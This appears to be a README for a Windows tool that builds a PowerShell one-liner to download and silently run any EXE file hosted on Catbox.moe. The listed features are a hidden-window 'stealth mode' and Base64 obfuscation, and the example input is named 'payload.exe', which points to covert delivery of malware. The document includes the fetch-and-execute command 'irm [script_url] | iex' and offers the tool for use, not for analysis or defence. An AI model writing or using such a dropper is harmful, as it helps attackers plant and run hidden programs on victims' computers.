A Windows application that generates a single PowerShell command to download and execute any EXE file from the internet.
- You select an EXE file
- It uploads the file to Catbox.moe
- It creates a PowerShell script that downloads and runs the file
- It uploads the script to Catbox.moe
- It gives you a ready-to-use PowerShell command
- Hidden: Runs PowerShell without showing a window (stealth mode)
- Encrypted: Obfuscates the command using Base64 encoding
After processing, the app gives you a command like:
powershell "irm [script_url] | iex"
Copy and paste this command in Command Prompt or PowerShell, and it will download and execute your EXE file automatically.
Select payload.exe App uploads it and gets a URL Creates a PowerShell script to download and run it Returns a one-liner command ready to use